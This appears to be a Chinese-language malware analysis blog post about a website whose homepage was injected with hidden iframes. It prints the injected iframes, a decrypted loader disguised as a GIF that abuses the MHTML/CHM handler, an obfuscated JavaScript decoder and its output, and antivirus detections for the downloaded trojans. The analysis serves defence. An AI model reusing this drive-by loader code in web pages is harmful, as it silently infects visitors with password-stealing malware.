[07-20] 带毒网站www.china***huati.com(第3版)

简介: [07-20] 带毒网站www.china***huati.com(第3版)

hxxp://www.china***huati.com首页被加入:  

--------------------------------

<iframe src=hxxp://bbs.**gemeus*.com/q17***/index.htm width=0 height=0></iframe>

……

<iframe height=0 width=0 src="hxxp://www.***ll-nba.com/*4***"></iframe>(endurer注:共有6处插入)

--------------------------------

hxxp://bbs.**gemeus*.com/q17***/index.htm的内容为:

--------------------------------

<script language="javascript" src="ah.js"></script>

--------------------------------

ah.js 的内容解密后的内容为:

--------------------------------

GIF89a

var GIF89a=document.location.href;GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));document.write('<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c://.mht!'+GIF89a+'/1.js::/#"></OBJECT>');

--------------------------------

冒充GIF文件,下载运行 1.js。

Kaspersky 将 1.js 报为: Packed.Win32.Klone.d( http://www.viruslist.com/en/viruses/encyclopedia?virusid=115946)。

江民KV 将 1.js 报为: Exploit.HTML.Mht.ae( http://virusinfo.jiangmin.com/infomation/200641010559.html)。

1.js 其实是个CHM文件,会释放/运行名为 msnmon.exe 的文件。

Kaspersky 将 msnmon.exe 报为: not-a-virus:AdWare.Win32.WSearch.k。

江民 对 msnmon.exe 的回复为: 不是病毒。

hxxp://www.***ll-nba.com/*4***的内容为:

------------------------
<SCRIPT LANGUAGE="JavaScript">
<!--
var HtmlStrings=["=iunm> =PCKFDU!tuzmf>#ejtqmbz;opof<#!uzqf>#ufyu0y.tdsjqumfu#!e","bub>#'$88'$86'$69'$75'$88'$94'$84'$95'$94'$227'$222'$225'$212","'$69'$21:'$215'$227'$21:'$219'$69'$::'$69'$:3'$57'$21:'$215'$","227'$44'$215'$227'$227'$223'$69'$580xxx/mm.ocb/dpn050mphp/kqh",";;0213&3F&79un#>=0PCKFDU> =0cpez> =0iunm> "];
function psw(st){
  var varS;
  varS="";
  var i;
  for(var a=0;a<st.length;a++){
    i = st.charCodeAt(a);
    if (i==1)
      varS=varS+String.fromCharCode('"'.charCodeAt()-1);
    else if (i==2) {
      a++;
      varS+=String.fromCharCode(st.charCodeAt(a));
      }
    else
      varS+=String.fromCharCode(i-1);
  }
  return varS;
};
var num=5;
function S(){
for(i=0;i<num;i++)
  document.write(psw(HtmlStrings[i]));}
S();
// -->
</SCRIPT>
-----------------------

代码运行后输出的内容为:

-----------------------
<html>
<OBJECT style="display:none;" type="text/x-scriptlet" data="MK:@MSITStore:mhtml:c:/.mht!http://www.***ll-nba.com/*4***/logo.jpg::/102%2E%68tm"></OBJECT>
</body>
</html>
-----------------------

会下载hxxp:///www.***ll-nba.com/*4***/logo.jpg。

Kaspersky 将 logo.jpg 报为:Trojan-PSW.Win32.QQShou.fw( http://www.viruslist.com/en/viruses/encyclopedia?virusid=123300)

江民KV 将 logo.jpg 报为:TrojanDropper.Mht.Psyme.gfi。


相关文章
|
4月前
|
开发者
www
自动
64 1
|
6月前
|
域名解析 开发工具 Windows
创建两个基于域名的虚拟主机1.www.aaa.com网页目录为/aaa2.www.bbb.com网页目录为/bbb
创建两个基于域名的虚拟主机1.www.aaa.com网页目录为/aaa2.www.bbb.com网页目录为/bbb
192 0
|
11月前
|
存储
WWW服务
WWW服务
494 0
|
11月前
|
数据采集 搜索推荐 BI
baby_web、Training-WWW-Robots、ics-06
baby_web、Training-WWW-Robots、ics-06
46 0
|
数据采集 Ubuntu 数据安全/隐私保护
Restclient-cpp库介绍和实际应用:爬取www.sohu.com
Restclient-cpp是一个用C++编写的简单而优雅的RESTful客户端库,它可以方便地发送HTTP请求和处理响应。它基于libcurl和jsoncpp,支持GET, POST, PUT, PATCH, DELETE, HEAD等方法,以及自定义HTTP头部,超时设置,代理服务器等功能。 本文将介绍如何使用Restclient-cpp库来实现一个简单的爬虫程序,爬取www.sohu.com网站的内容,并将其保存为本地文件。为了避免被目标网站屏蔽或限制访问,我们还将使用亿牛云爬虫代理来提供高效稳定的代理IP服务。
158 0
|
数据可视化 定位技术 Go
Visualize Famous Campus in China
Visualize Famous Campus in ChinaIn the end of the 9th month of 2017, many great events happened. One influential thing is the launch of the country’s .
1699 0
|
搜索推荐 SQL 数据安全/隐私保护